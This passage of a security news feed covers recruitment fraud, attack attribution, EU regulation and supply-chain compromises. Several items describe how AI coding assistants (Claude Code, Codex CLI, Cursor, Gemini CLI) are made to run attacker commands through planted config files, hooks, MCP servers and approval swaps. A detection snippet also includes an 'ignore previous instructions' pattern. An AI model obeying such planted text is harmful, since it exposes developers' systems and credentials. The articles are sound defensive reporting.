## Maintaining vigilance in hiring

Recruitment fraud causes immediate financial harm to targeted individuals and can affect the reputation of the impersonated organizations. Similar social engineering campaigns that impersonate trusted employers to increase the success rate of malicious outreach have been documented across the industry. For instance, North Korean threat groups, including Lazarus, frequently utilize fraudulent job recruitment operations, such as the known "Dream Jobs" campaigns, to gather intelligence and support unauthorized activities.

These campaigns disrupt legitimate hiring processes. As Moore explained, they succeed by weaponizing "the complexity of modern hiring by manufacturing artificial bureaucratic barriers and high-pressure review windows to solicit fees." He confirmed that Palo Alto Networks remains committed to a transparent hiring process and will never require candidates to pay for resume optimization services.

Any professional receiving employment communications that establish a sense of financial urgency or direct them to a paid third-party service should treat the interaction as a fraudulent attempt to exploit their professional ambitions.

If an individual encounters this specific campaign, Unit 42 recommends ceasing all communication immediately and reporting the event to Palo Alto Networks at infosec(at)paloaltonetworks(dot)com. Additionally, candidates should flag the offending profiles on LinkedIn and secure their professional, social media, and email accounts by updating passwords and enabling multifactor authentication (MFA) to safeguard their digital identity.

About the Author
Elizabeth Montalbano is a contributing freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. She has previously worked as a full-time journalist in Phoenix, San Francisco, and New York City, and currently resides in Portugal.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Navigating the risks of public threat actor attribution</title>
        <link>https://security.shortwaves.live/blog/cfff76e4-fcbb-41cf-9485-c1fe9df1fcf1</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/cfff76e4-fcbb-41cf-9485-c1fe9df1fcf1</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:48 GMT</pubDate>
        <description>Security leaders at RSAC 2026 evaluated the complexities of public threat actor attribution. While identifying the source of a security incident can provide valuable context, definitive public statements carry distinct risks for an affected organization&apos;s communication strategy and risk management.</description>
        <content:encoded><![CDATA[
            RSAC 2026 CONFERENCE – San Francisco – Questions about threat actor attribution, including the methodology behind it and the strategic reasons to delay public statements, require careful consideration from security teams and legal counsel.

Attribution is the process of identifying the responsible party for a security incident. Depending on the methodology and available evidence, researchers might determine that a specific threat group gained unauthorized access to an organization's network. In other cases, analysts identify a "cluster," which connects patterns of activity without linking a threat actor or nation-state to that activity with complete certainty. Security vendors frequently use custom naming taxonomies to track these threat groups, such as Salt Typhoon or Sandworm.

The decision-making process becomes more complex when organizations use these internal identifiers as public signifiers to share research or communicate about an active threat.

A panel at the RSAC 2026 Conference, titled "We Think It Was Them: The Perils of Attribution in Public Statements," evaluated these operational decisions. Axios reporter Sam Sabin hosted the discussion, which featured FTI Consulting senior advisor Brett Callow, Institute for Security and Technology chief strategy officer Megan Stifel, and Cooley LLP partner Mike Egan. They addressed the probabilistic nature of attribution, the criteria for public statements, and the potential consequences of attempting to name a threat actor.

## Misconceptions surrounding threat actor attribution

Callow stated that a recurring misconception about attribution is treating the process as definitive rather than probabilistic. He noted that investigations usually conclude it is "more likely than not that a particular entity was responsible, but that nuance doesn't always get carried out."

Egan agreed, observing that absolute certainty regarding unauthorized access is rare unless the threat actor intentionally seeks visibility. This is further complicated by the documented propensity for entities like ransomware groups to lie and claim responsibility for incidents they did not conduct.

Egan also shared that some legal clients operate under the misconception that attributing an incident to a sophisticated nation-state will divert responsibility from the defending organization and improve the public narrative.

"We've had instances of that in the past where the FBI has come out and told the company, 'Listen, 99% of companies wouldn't be able to withstand this attack. This is a pure nation-state attack.' I get the attraction behind that, but it changes the narrative a bit and then can make some people a little bit more concerned," Egan explained. "Now all of a sudden, we're not talking about just a personal data breach but something bigger, and that story sticks around longer."

## Attribution and operational risk

While establishing a firm attribution profile can seem appealing, the panelists advised organizations to weigh the secondary consequences. Callow described definitive public attribution as "extremely risky" because it introduces third parties into the operational narrative. "That could be a nation or it could be a for-profit criminal enterprise. In either case, whatever you say to them can attract considerable blowback and invite comments," he said.

The panel also addressed how attribution can directly impact cyber insurance coverage. Following the NotPetya ransomware incidents in 2017, some insurance providers initially denied claims from affected organizations. The insurers argued that the policies did not cover acts of war, given that the activity was directed at Ukraine before spreading globally and was attributed to Russian nation-state actors tracked as Sandworm.

Despite these concerns, there are also risks to remaining silent. Stifel, who previously served as an attorney in the National Security Division at the US Department of Justice, noted that declining to make an attribution case might unintentionally signal acceptance of the unauthorized behavior.

Sabin prompted the panel on how to handle situations where an affected organization is not ready to make a concrete attribution, but external pressures—such as media leaks—force the issue. Premature attribution carries clear risks, yet organizations generally need to maintain control over their own communication narratives.

The panelists offered differing strategies for this scenario. Stifel recommended acknowledging that the organization is aware of the reports, confirming that an incident occurred, and stating that the investigation is ongoing. Egan advocated for a stricter legal approach, advising clients to hold the "no comment" line while the internal investigation proceeds. "Oftentimes the best answer is no answer. We're concentrating on the investigation," Egan said.

Callow offered a different perspective on filling the communication gap.

"I don't think 'no comment' is ever a good response. If you don't fill that gap, somebody else will," he said. "You don't necessarily have to attribute the attack, but you should, for example, say the investigation is ongoing."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>European officials lead AI and regulatory discussions at RSAC 2026</title>
        <link>https://security.shortwaves.live/blog/c2f45872-d53f-4ca7-b5df-0d10ebd7e86f</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/c2f45872-d53f-4ca7-b5df-0d10ebd7e86f</guid>
        <pubDate>Thu, 26 Mar 2026 03:20:48 GMT</pubDate>
        <description>Following the withdrawal of US federal agencies from RSAC 2026, European cybersecurity leaders engaged the private sector to establish security standards for AI-generated code and prepare for the upcoming EU Cyber Resilience Act.</description>
        <content:encoded><![CDATA[
            At the RSAC 2026 Conference in San Francisco, European cybersecurity leaders led regulatory and technical discussions following the notable absence of US government officials. Representatives from the FBI and the NSA withdrew from the event, a significant shift from previous years when leaders such as former DHS Secretary Kristi Noem (2025) and Secretary of State Antony Blinken alongside DHS Secretary Alejandro Mayorkas (2024) attended to provide guidance to the private sector.

Reports indicate the withdrawal of US federal agencies followed the conference's decision to hire former CISA Director Jen Easterly as CEO. This shift in participation occurs during a period of complex global security challenges, including ongoing nation-state cyber operations originating from Iran, the development of quantum computing, and the critical need to establish safety parameters for artificial intelligence.

## Establishing guardrails for AI-generated code

With US officials not in attendance, European leaders prioritized proactive defense and collaboration with the technology sector. Dr. Richard Horne, chief executive of the UK's National Cyber Security Centre, used his keynote presentation to advocate for security standards in "vibe coding"—the use of AI to generate software code. Horne noted the productivity benefits of AI tools but emphasized the responsibility of security professionals to make these technologies a net positive for digital safety.

Because vibe coding lowers the barrier to software creation, its adoption is accelerating rapidly. Horne advised the industry to build security into the foundation of these tools to prevent the introduction of unintended vulnerabilities before adoption scales further.

"The attractions of vibe coding are clear, and disrupting the status quo of manually produced software that is consistently vulnerable is a huge opportunity, but not without risk of its own," he stated. "The AI tools we use to develop code must be designed and trained from the outset so that they do not introduce or propagate unintended vulnerabilities."

## Preparing for the EU Cyber Resilience Act

European Union regulators also engaged the private sector regarding upcoming compliance requirements, specifically the EU Cyber Resilience Act, scheduled to take effect in December 2027. Despina Spanou, deputy director general for networks and technology–cybersecurity coordination at the European Commission DG CNECT, and Christiane Kirketerp de Viron, director for digital society, trust, and cybersecurity, outlined the proposed regulations and gathered feedback from industry partners.

Addressing concerns about regulatory friction, Spanou compared the upcoming changes to the 2018 rollout of the GDPR, noting that initial industry anxieties did not materialize into systemic disruptions. The officials emphasized that securing the technology supply chain is their primary focus, especially as AI integrations become more prevalent. Spanou advised the private sector to view cybersecurity as a comprehensive defense strategy that extends beyond data systems to include physical assets like drones.

Edvardas Šileris, head of the European Cybercrime Centre (EC3) at Europol, discussed his organization's capacity for proactive mitigation against threat actors and encouraged deeper collaboration with private organizations.

When asked whether the US remains a reliable partner for Europe given the current dynamics, Šileris and Kirketerp de Viron declined to comment directly. Spanou provided the sole response, reiterating the position of EU President Ursula von der Leyen: "The American people will always be our friends."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing Developer Environments Against Emerging Supply Chain and AI Assistant Vulnerabilities</title>
        <link>https://security.shortwaves.live/blog/f3e433a5-2991-472c-a735-1c7993bbe9c1</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/f3e433a5-2991-472c-a735-1c7993bbe9c1</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:19 GMT</pubDate>
        <description>Recent supply chain incidents and newly identified vulnerabilities in AI coding assistants present significant risks to developer workstations. By enforcing strict isolation for AI-automated tasks and adopting proactive secret management, security teams can effectively safeguard the software development life cycle from unauthorized access.</description>
        <content:encoded><![CDATA[
            Recent interconnected supply chain incidents and newly disclosed vulnerabilities require immediate attention from security teams protecting developer workstations. While organizations frequently prioritize hardening production environments, developments involving Checkmarx, Aqua Security, and widely used AI coding assistants show that unauthorized parties are shifting focus to the software development life cycle (SDLC). By compromising trusted development tools, these groups aim to establish access during the earliest stages of software creation.

Immediate remediation is necessary for a widening supply chain incident attributed to the threat group TeamPCP. Following unauthorized access to Aqua Security’s Trivy project, Checkmarx reported this morning that unauthorized parties modified its "Keeping Infrastructure as Code Secure" (KICS) GitHub Action and two VS Code plugins. This campaign has rapidly expanded to include the Litellm Python package on PyPI, a component integrated into an estimated 36% of modern cloud environments for AI development. Organizations running automated pipelines using the affected KICS action during a four-hour window on March 23, or downloading the compromised VS Code plugins from the OpenVSX registry on that date, must treat their environments as exposed.

The technical mechanics of these incidents center on credential exfiltration. TeamPCP leveraged compromised privileged credentials and automated service accounts to inject credential-harvesting software into dozens of software versions. Once active, this software targets sensitive data, including SSH keys, cloud provider credentials, API tokens, and Docker configurations. This creates a "snowball effect" (a term the threat group used in public Telegram messages), where stolen secrets from one exposure immediately enable subsequent access. The inclusion of the Queen song "The Show Must Go On" in their deployment metadata indicates the group plans to maintain focus on popular open-source projects.

Alongside risks to code-scanning utilities, researchers sharing data at the RSAC 2026 Conference detailed systemic vulnerabilities in the tools used to write code. The rapid adoption of AI coding assistants, including Claude Code, Cursor, and Google’s Gemini, introduces architectural changes that bypass traditional endpoint detection and response (EDR) and browser isolation. Because these AI agents require deep access to local filesystems and developer configurations to function, they operate with elevated permissions that complicate standard endpoint security measures.

Analysis from the conference details how these tools interpret configuration metadata as active instructions. In one high-severity flaw affecting Claude Code (CVE-2025-59536), unauthorized parties can manipulate "hooks" (user-defined shell commands) to execute code before a user accepts a trust dialog. Similarly, the Cursor platform contains a remote code execution vulnerability (CVE-2025-54136) where authorization for a plugin is bound to its name rather than a cryptographic hash. This allows a benign, approved command to be swapped for an unauthorized one after the developer grants permission. These vulnerabilities turn AI assistants into unintended access points, processing "Configuration as Code" in ways that existing security products struggle to monitor or distinguish from routine developer activity.

The scale of this risk is compounded by "TroyDen's Lure Factory," a massive operation recently identified by Netskope Threat Labs. This campaign uses AI-generated lures to distribute over 300 compromised GitHub packages, ranging from AI deployment tools like OpenClaw to gaming utilities and VPN software. The operation relies on a dual-component design: a renamed Lua runtime paired with an encrypted script. When analyzed individually, these files appear benign to automated sandboxes. Executed together, they trigger anti-analysis checks, including a 29,000-year "sleep" delay to outlast timed sandboxes, before exfiltrating full-desktop screenshots and credentials to a command-and-control server in Frankfurt.

We recommend an immediate strategy shift for defensive teams. The priority for any organization potentially exposed during the Checkmarx or Litellm incidents is a comprehensive rotation of all secrets. This includes personal access tokens (PATs), cloud IAM keys, and API credentials. Because the credential-harvesting software targets a broad range of tokens, partial rotation is insufficient; defenders should proceed under the assumption that all secrets present on a developer's workstation or within a CI/CD environment at the time of the incident are compromised.

In addition to reactive secret rotation, the vulnerabilities in AI assistants necessitate a transition toward zero-trust developer environments. Security teams should treat developer workstations as a critical perimeter and enforce strict isolation for AI-automated tasks. Executing AI-driven shell commands within a sandbox is now a foundational requirement for securing these workflows. Organizations must also adopt policies where configuration files (.env, .json, .toml) undergo the same scrutiny as executable binaries. Any GitHub-hosted download pairing a renamed interpreter with an opaque data file should prompt manual contextual review, as these are primary indicators of the stealthy LuaJIT-based threats observed in the "Lure Factory" campaign.

The convergence of automated distribution networks and vulnerable AI agents indicates that the volume of supply chain risks will soon outpace traditional manual triage. Threat groups are successfully using AI to scale their infrastructure and identify subtle bypasses in developer workflows. The collaboration between groups like TeamPCP and extortion units like LAPSUS$ suggests that credential theft serves as the entry point for lateral movement and data ransom.

At this stage, the exact mechanism for the unauthorized code injection in the Checkmarx KICS action remains under investigation, and several CVSS scores for the newly disclosed AI assistant vulnerabilities are still pending. As the industry processes these disclosures, protecting the developer environment requires moving beyond automated scanning to proactive secret management and behavioral isolation. We work with security teams to implement these controls and safeguard the software development life cycle.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat actors distribute compromised GitHub packages using OpenClaw and gaming lures</title>
        <link>https://security.shortwaves.live/blog/3955be3e-eb63-4668-a299-9be186c07c3e</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/3955be3e-eb63-4668-a299-9be186c07c3e</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:19 GMT</pubDate>
        <description>A large-scale operation tracked as &quot;TroyDen&apos;s Lure Factory&quot; is distributing more than 300 compromised GitHub packages via artificial intelligence-generated lures. Security teams must look beyond automated sandbox analysis to identify these dual-component threats before they enter the software supply chain.</description>
        <content:encoded><![CDATA[
            A widespread campaign leveraging AI-assisted generation is distributing more than 300 compromised GitHub packages to developers and general users. Identified by Netskope Threat Labs, the operation, tracked as "TroyDen's Lure Factory," operates across multiple repositories on the platform and conceals malicious components behind a variety of software lures.

These lures include deployment files for the OpenClaw AI tool, a Telegram-promoted phone tracker, a Fishing Planet game utility, Roblox scripts, cryptocurrency tools, and VPN software. The common mechanism across these packages is a LuaJIT-based unauthorized component designed to perform system geolocation, capture screenshots, and exfiltrate sensitive data.

Netskope first discovered the packages in a GitHub repository distributing a custom LuaJIT tool engineered to evade automated detection systems.

"The repository impersonated a Docker deployment tool for a legitimate AI project to deploy containerized OpenClaw, using the real upstream repository, a polished README, and a github.io page to appear authentic," Netskope senior staff threat research engineer Vini Egerland wrote in the published report.

## Establishing false legitimacy

To build credibility, the operation targets users seeking simple installations of the OpenClaw project. The repository featured a detailed README with installation instructions for both Linux and Windows environments.

The threat actors took significant steps to make the repository appear authentic. They listed multiple contributors and, during a private pre-launch phase, invited a developer with a highly starred repository to join the project. This developer subsequently contributed functional code, likely in good faith.

Further investigation connected the creator to additional packages hosted across multiple GitHub repositories, totaling more than 300 confirmed compromised packages affecting diverse user bases simultaneously. Netskope reported the malicious projects to GitHub on March 20. At the time of the initial report, two repository lures, the "Fishing Planet Cheat Menu" and the "phone-number-location-tracking-tool", remained active.

## Component execution and evasion

The malicious software utilizes a two-component design: a renamed Lua runtime paired with an encrypted script. Netskope found that each component passes automated sandbox analysis when submitted individually.

"The threat only emerges when both components execute together, resulting in five anti-analysis checks, a sleep delay of roughly 29,000 years to defeat timed sandboxes, and an immediate full-desktop screenshot exfiltrated as soon as it executes, and credential theft behaviour," Egerland wrote.

Once active, the software exfiltrates collected data to a command-and-control (C2) server located in Frankfurt. The tool also embeds credential-theft capabilities, indicating a risk for lateral movement and further system compromise.

Evidence indicates the threat actors used operational AI to scale the campaign's infrastructure. The lure names systematically apply obscure biological taxonomy, archaic Latin, and medical terminology across the ecosystem. This approach demonstrates a shift toward using automated, AI-driven processes to build scalable threat environments, moving away from isolated incidents toward continuously generated threat infrastructure.

## Defending the development pipeline

This operation exposes a specific gap in standard automated analysis pipelines, requiring security teams to apply contextual review to protect the software development life cycle. If developers incorporate a compromised package into legitimate software, the broader supply chain faces risk unless the code is identified before reaching an operational environment.

"The result is a threat designed to pass every automated layer (individual file submission, behavioral sandbox, hash matching) and surface only when a human analyst runs everything together in context," Egerland noted.

The sheer volume and breadth of the lures indicate the threat actor prioritizes scale over precision targeting. To defend against this methodology, organizations should treat any GitHub-hosted download that pairs a renamed interpreter with an opaque data file as a high-priority triage candidate, regardless of the surrounding repository's apparent legitimacy.
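That triage rule can be operationalized as a simple pairing heuristic: flag a file that carries executable or LuaJIT magic bytes under an innocuous name when it sits next to a statistically opaque companion file. The sketch below is a minimal illustration; the `triage_pair` and `shannon_entropy` helpers and the 7.5-bit entropy threshold are assumptions for demonstration, not a production detection rule.

```python
import math
from pathlib import Path

# Well-known format signatures: ELF and PE executables, plus the
# LuaJIT bytecode header. Presence under a non-executable filename
# is treated as suspicious by this heuristic.
MAGIC = {
    b"\x7fELF": "ELF executable",
    b"MZ": "PE executable",
    b"\x1bLJ": "LuaJIT bytecode",
}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encrypted or compressed payloads approach 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in counts if c)

def triage_pair(interpreter: Path, data_file: Path) -> bool:
    """Flag a download pairing a disguised executable with an opaque
    (high-entropy) data file, the pattern described above."""
    head = interpreter.read_bytes()[:4]
    looks_executable = any(head.startswith(m) for m in MAGIC)
    innocuous_name = interpreter.suffix not in {".exe", ".bin", ".so", ".dll"}
    opaque = shannon_entropy(data_file.read_bytes()) > 7.5
    return looks_executable and innocuous_name and opaque
```

A hit from this check does not prove compromise; it routes the pair to the human-in-context review the quoted analysis calls for.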

A comprehensive list of indicators of compromise (IOCs), including hashes, endpoint patterns, and associated GitHub accounts, is available in the Netskope report to assist security teams with detection and blocking rules.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Reevaluating endpoint security in the era of AI coding assistants</title>
        <link>https://security.shortwaves.live/blog/c5541bb8-ff50-42d4-89ad-5fac0f527b5d</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/c5541bb8-ff50-42d4-89ad-5fac0f527b5d</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:19 GMT</pubDate>
        <description>Recent research presented at RSAC 2026 identifies systemic vulnerabilities in popular AI coding assistants that bypass traditional endpoint defenses. By adjusting configurations and establishing zero-trust policies for developer environments, organizations can safely integrate these tools while maintaining reliable security visibility.</description>
        <content:encoded><![CDATA[
            Artificial intelligence development tools are introducing fundamentally new client-side risks, requiring the security industry to update how it monitors and protects developer environments.

During a session at the RSAC 2026 Conference in San Francisco, Oded Vanunu, chief technologist at Check Point Software, detailed how the architecture of AI coding assistants inadvertently bypasses modern endpoint defenses. The session, titled "When AI Agents Become Backdoors: The New Era of Client-Side Threat," outlined a series of vulnerabilities discovered in tools including Anthropic's Claude Code, OpenAI's Codex, Google's Gemini, and Cursor.

Vanunu and his research team spent the past year evaluating AI development tools. They found that the rapid adoption of these agents is reshaping endpoint security, bypassing many of the protections the cybersecurity industry built over the past decade as it hardened endpoints and moved application execution to the cloud.

## Understanding the endpoint visibility gap

Over the past 20 years, security teams successfully reduced client-side risk through operating system hardening, sandboxing, endpoint detection and response (EDR), and browser isolation. The transition to software-as-a-service (SaaS) effectively turned endpoints into thin clients, significantly reducing the available surface for unauthorized access.

However, AI coding assistants require deep access to local filesystems and developer configurations to function effectively. Because developers typically assign these tools high privileges and broad network access, the agents establish operational pathways that bypass traditional security boundaries. Furthermore, because these tools operate autonomously and with elevated permissions, conventional security technologies struggle to monitor their actions or distinguish routine tasks from unauthorized activity.

According to Vanunu, security products currently lack the visibility required to understand or control agentic AI behavior at the endpoint.

Compounding this visibility gap is how AI tools interpret configuration files. These agents process configuration metadata as active execution instructions. While developers are typically cautious when handling executable files, they exercise less oversight over configuration formats like .json, .env, or .toml. Malicious actors can insert seemingly benign text into configuration metadata, instructing the agent to run unauthorized commands. This dynamic allows threat actors to utilize standard configuration files rather than traditional malicious software.
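One way to extend executable-grade scrutiny to configuration files is a lightweight review pass over a repository tree. The sketch below is illustrative only: the `scan_config_tree` helper and its pattern list are assumptions for demonstration, and real tooling would pair this with allow-listing and human review.

```python
import re
from pathlib import Path

# Example patterns for instruction-like content hiding in config files.
# Deliberately small: pipe-to-shell downloads, inline shell invocation,
# staged payload decoding, and prompt-injection phrasing.
SUSPICIOUS_PATTERNS = [
    re.compile(r"curl\s+\S+\s*\|\s*(?:sh|bash)"),
    re.compile(r"\b(?:bash|sh|powershell)\s+-c\b"),
    re.compile(r"base64\s+(?:-d|--decode)\b"),
    re.compile(r"ignore (?:all )?previous instructions", re.I),
]

def is_config_file(path: Path) -> bool:
    # A bare ".env" has no suffix in pathlib's view, so match it by name.
    return path.suffix in {".json", ".toml", ".env"} or path.name == ".env"

def scan_config_tree(root: Path) -> list[tuple[str, str]]:
    """Return (file, pattern) pairs for every suspicious match under root."""
    hits = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and is_config_file(path):
            text = path.read_text(errors="ignore")
            for pattern in SUSPICIOUS_PATTERNS:
                if pattern.search(text):
                    hits.append((str(path), pattern.pattern))
    return hits
```

Run as a pre-commit or repository-intake step, this surfaces config files that warrant the same manual review an unknown binary would receive.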

## Identified vulnerabilities in AI assistants

Vanunu’s team identified six specific vulnerabilities across popular AI coding platforms. The respective vendors have since patched these flaws.

In Claude Code, researchers discovered a high-severity flaw (CVE-2025-59536) that allows an unauthorized party to manipulate the tool into executing hidden code before the user accepts the startup trust dialog. This vulnerability can be used to manipulate Claude Code Hooks—user-defined shell commands designed to run automatically—thereby bypassing EDR products. Additionally, researchers demonstrated a model context protocol (MCP) consent bypass. While Claude requires user consent before executing MCP server plug-ins, Claude Code reads configurations automatically, allowing unauthorized MCP servers to run commands before the trust dialog appears.

In the OpenAI Codex CLI, the team identified a code injection vulnerability (CVE-2025-61260, CVSS score pending). This flaw allows a modified project .env file to redirect the CLI to a local .toml configuration file. The configuration then connects to unauthorized MCP servers, prompting the coding tool to execute commands immediately without human oversight.

The researchers also documented CVE-2025-54136, a high-severity remote code execution (RCE) vulnerability in the Cursor coding platform. When a developer approves an MCP server command, Cursor binds that authorization to the plug-in's name rather than the specific content hash of the approved action. This discrepancy enables a swap technique: an unauthorized party can submit a benign command for approval, then update the plug-in with unauthorized instructions once authorization is granted.
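
The name-versus-hash distinction can be made concrete with a short sketch. The snippet below is an illustration, not Cursor's actual fix; `ApprovalStore` is a hypothetical class. It binds approval to a SHA-256 digest of the command content, so a post-approval swap of the plug-in's instructions fails the check:

```python
import hashlib


class ApprovalStore:
    """Records approvals keyed by content hash, not by plug-in name."""

    def __init__(self):
        self._approved = set()

    @staticmethod
    def _digest(command: str) -> str:
        # Hash the exact bytes of the command the user saw and approved.
        return hashlib.sha256(command.encode("utf-8")).hexdigest()

    def approve(self, command: str) -> None:
        self._approved.add(self._digest(command))

    def is_approved(self, command: str) -> bool:
        # Any change to the command content produces a different digest,
        # so a swapped payload is rejected even under the same plug-in name.
        return self._digest(command) in self._approved


store = ApprovalStore()
store.approve("echo hello")          # user approves the benign command
store.is_approved("echo hello")      # same content, same hash: allowed
store.is_approved("curl evil | sh")  # swapped content fails the check
```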

Finally, the session detailed an unassigned flaw in Google's Gemini CLI. This vulnerability allows unauthorized commands to be disguised as legitimate scripts within documentation files. If an embedded command is placed in a GEMINI.md file, the tool executes it silently without requiring user approval.

## Securing the developer perimeter

While the four vendors have addressed these specific vulnerabilities, the findings illustrate new paths for unauthorized access and emphasize that developer workstations now represent a critical security perimeter.

To safely deploy AI coding assistants, Vanunu recommends organizations take immediate steps to evaluate their environments:

1. Conduct a comprehensive audit to identify all AI technology currently in use, actively looking for unauthorized or "shadow AI" tools.

2. Analyze all project metadata and configuration files for suspicious or undocumented content.

3. Require isolation for coding tools, ensuring that all AI-automated shell tasks execute within strict sandbox environments.

4. Adopt a "Configuration = Code" policy for developer workstations, treating these environments with zero-trust principles where no text is executed without explicit verification.
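
Step 2 can be partially automated. The following sketch is illustrative only; real audits should use curated rule sets rather than these three sample patterns. It scans common configuration formats for pipe-to-shell commands, prompt-injection phrasing, and decode-and-run staging:

```python
import re
from pathlib import Path

# Illustrative patterns only; production audits need curated rule sets.
SUSPICIOUS = [
    re.compile(r"curl\s+[^|]+\|\s*(sh|bash)"),                 # pipe-to-shell
    re.compile(r"ignore (all )?previous instructions", re.I),  # prompt injection
    re.compile(r"\bbase64\s+-d\b"),                            # decode-and-run staging
]


def audit_config(path: Path) -> list[str]:
    """Return the suspicious lines found in one config file."""
    hits = []
    for line in path.read_text(errors="ignore").splitlines():
        if any(p.search(line) for p in SUSPICIOUS):
            hits.append(line.strip())
    return hits


def audit_tree(root: Path, exts=(".json", ".env", ".toml", ".md")) -> dict:
    """Audit every matching config file under a project root."""
    return {p: audit_config(p)
            for p in root.rglob("*")
            if p.is_file() and p.suffix in exts}
```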

By applying these controls, security teams can redesign their defense strategies to support developer productivity while maintaining rigorous protection over local and cloud environments.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Checkmarx KICS and VS Code plugins affected by widening supply chain security incident</title>
        <link>https://security.shortwaves.live/blog/9f3cbe61-909a-4fdf-972d-81136daad191</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/9f3cbe61-909a-4fdf-972d-81136daad191</guid>
        <pubDate>Wed, 25 Mar 2026 03:16:18 GMT</pubDate>
        <description>Following a recent incident involving the Trivy security scanner, threat actors have introduced infostealing malware into Checkmarx KICS, OpenVSX plugins, and the Litellm Python package. Organizations can protect their CI/CD pipelines by identifying exposed secrets and rotating credentials immediately.</description>
        <content:encoded><![CDATA[
            Following a recent supply chain security incident affecting the Aqua Security-maintained Trivy project, Checkmarx disclosed that unauthorized parties modified a version of Keeping Infrastructure as Code Secure (KICS), its open-source static code analysis project.

Threat actors gained unauthorized access to the KICS GitHub Action—a tool organizations use to run security scans within CI/CD pipelines—and introduced unauthorized code into multiple software versions. Checkmarx noted that any organization with automated pipelines configured to run this action during a four-hour window on the morning of March 23 could be affected.

That same day, unauthorized versions of two Checkmarx VS Code plug-ins appeared on the OpenVSX registry, where they remained available for download for approximately three hours.

This disclosure follows closely behind Aqua Security's report of a related incident. In that case, a threat actor used previously stolen privileged credentials to insert an infostealer into 76 previously released versions of Trivy's GitHub Action. The actor also used a compromised automated service account to publish two unauthorized Docker images.

Security researchers attribute the malware in both incidents to TeamPCP, a threat group known for automated credential theft targeting cloud infrastructure.

## Expanding scope across software registries

The campaign has since expanded to other package ecosystems. GitGuardian researchers reported that the same threat actor introduced the infostealer into the PyPI software registry, affecting versions 1.82.7 and 1.82.8 of the Litellm package. PyPI maintainers have since removed the affected files.

The infostealer is designed to exfiltrate a wide range of sensitive data, including SSH keys, cloud credentials, API tokens, Docker configurations, and cryptocurrency wallet information. Because many organizations rely on Litellm to build AI-powered applications, the potential scope of impact is significant. Guillaume Valadon, a cybersecurity researcher at GitGuardian, noted that Litellm receives millions of downloads daily, elevating the priority of the incident.

Valadon emphasizes that threat actors are actively pursuing developer secrets. To mitigate this risk, security teams should maintain a real-time inventory of their secrets so they can revoke exposed credentials rapidly during an incident, before lateral movement can occur.
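
A real-time secrets inventory starts with knowing what credential material is present. The sketch below is illustrative; the three detectors are a tiny sample of the patterns production secret scanners match. It counts credential-shaped strings so teams know what to rotate first during an incident:

```python
import re

# Illustrative detectors; production scanners ship far larger rule sets.
DETECTORS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "ssh_private_key":   re.compile(r"-----BEGIN (?:RSA |OPENSSH )?PRIVATE KEY-----"),
    "github_pat":        re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}


def inventory_secrets(text: str) -> dict[str, int]:
    """Count matches per secret type so rotation can be prioritized."""
    return {name: len(rx.findall(text))
            for name, rx in DETECTORS.items()
            if rx.search(text)}
```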

## Recommended actions for security teams

Checkmarx is currently investigating the incident and actively working to ensure all malicious artifacts are permanently removed from OpenVSX. While the company has not publicly detailed the exact mechanism of the unauthorized code, the behavior aligns with an infostealer.

Checkmarx strongly recommends that any organization whose automated build pipelines may have interacted with the affected plug-ins immediately rotate all access keys, personal access tokens (PATs), and login credentials.

## Shared indicators and ongoing threat activity

Security researchers confirm that the Trivy, Checkmarx, and Litellm incidents share operational links. Valadon pointed out common indicators of compromise (IoCs) across the events, including the public key used for data exfiltration, the specific targeted services, and the persistence techniques employed.

Wiz Research, which is independently tracking the campaign, corroborated the TeamPCP attribution. Ben Read, a lead researcher at Wiz, stated that their telemetry indicates a common actor across the compromises. Wiz researchers estimate that Litellm is present in 36% of modern cloud environments.

By targeting security scanners and AI development tools, these threat actors aim to establish a presence in highly sensitive stages of the software development life cycle. Wiz also noted indications that TeamPCP may be collaborating with the LAPSUS$ extortion group to expand their operations.

The threat actors left a link to the Queen song "The Show Must Go On" in their deployment, and public Telegram messages from the group reference a "snowball effect" alongside future targets across popular open-source projects, indicating that organizations should remain vigilant and proactively rotate exposed credentials.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing the Supply Chain and AI Integration: Analysis of the Trivy Exposure and PureLog Campaign</title>
        <link>https://security.shortwaves.live/blog/8030b0a7-dc50-4c60-b585-6eab2c669a54</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/8030b0a7-dc50-4c60-b585-6eab2c669a54</guid>
        <pubDate>Tue, 24 Mar 2026 03:13:47 GMT</pubDate>
        <description>Recent security incidents affecting the Trivy CI/CD ecosystem and ongoing PureLog infostealer campaigns require immediate attention and specific configuration changes. Alongside these active developments, early trials of AI integration in security operations show measurable efficiency gains, provided organizations implement strict human-on-the-loop governance.</description>
        <content:encoded><![CDATA[
            As security leaders convene in San Francisco for RSAC 2026, discussions are moving from the theoretical applications of artificial intelligence to the practical realities of operational integration. Briefings this week outline a complex environment: while AI reduces analyst workloads, the underlying infrastructure organizations rely on to secure code faces persistent pressure. A recent software supply chain incident affecting the Trivy security scanner demonstrates that as defense automation increases, the tools themselves become high-value focal points for sophisticated data collection efforts.

